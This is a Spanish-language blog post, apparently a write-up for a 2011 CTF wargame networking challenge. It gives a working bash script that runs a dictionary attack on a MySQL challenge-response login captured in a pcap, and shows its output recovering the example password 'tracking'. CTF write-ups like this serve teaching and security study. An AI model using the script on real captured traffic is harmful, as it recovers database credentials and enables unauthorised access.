En el reto 'networking 2' del wargame de sbd 2011 proporcionan un pcap con el proceso de autenticación contra una base de datos mysql.
Utilizaremos un salt y una contraseña distintos.
Salt: x8MXV%QLgDZ{ypGN6^Y#
Contraseña: d648fcba578670abf1ec93b0dce1b41f681dc71c
Ejecución
#cat diccionario.txthack tracking wargame #cat mysql_sha1_salt.sh#!/bin/bash function dec2hex { printf %x $1 } function hex2ascii { printf %s $1 | xxd -r -p } function hex2dec { printf %d $1 } function sha1 { printf %s $1 | sha1sum | cut -d ' ' -f1 } function xor { length=$[$1-1] string_a=$2 string_b=$3 for i in `seq 0 $length` do a=`hex2dec 0x${string_a:$i:1}` b=`hex2dec 0x${string_b:$i:1}` xored=$xored`dec2hex $(printf '%d' $[$a^$b])` done printf %s $xored } salt=$1 password_file=$2 captured_password=$3 while read secret do hash_stage_1=`sha1 $secret` hash_stage_1_=`hex2ascii $hash_stage_1` #echo $hash_stage_1 hash_stage_2=`sha1 $hash_stage_1_` hash_stage_2_=`hex2ascii $hash_stage_2` #echo $hash_stage_2 hash_stage_3=`sha1 $salt$hash_stage_2_` #echo $hash_stage_3 generated_password=`xor 40 $hash_stage_1 $hash_stage_3` #echo $generated_password if [ $generated_password == $captured_password ] then echo "$secret --> $captured_password" fi done < $password_file #./mysql_sha1_salt.sh x8MXV%QLgDZ{ypGN6^Y# \ diccionario.txt \ d648fcba578670abf1ec93b0dce1b41f681dc71ctracking --> d648fcba578670abf1ec93b0dce1b41f681dc71c
No comments:
Post a Comment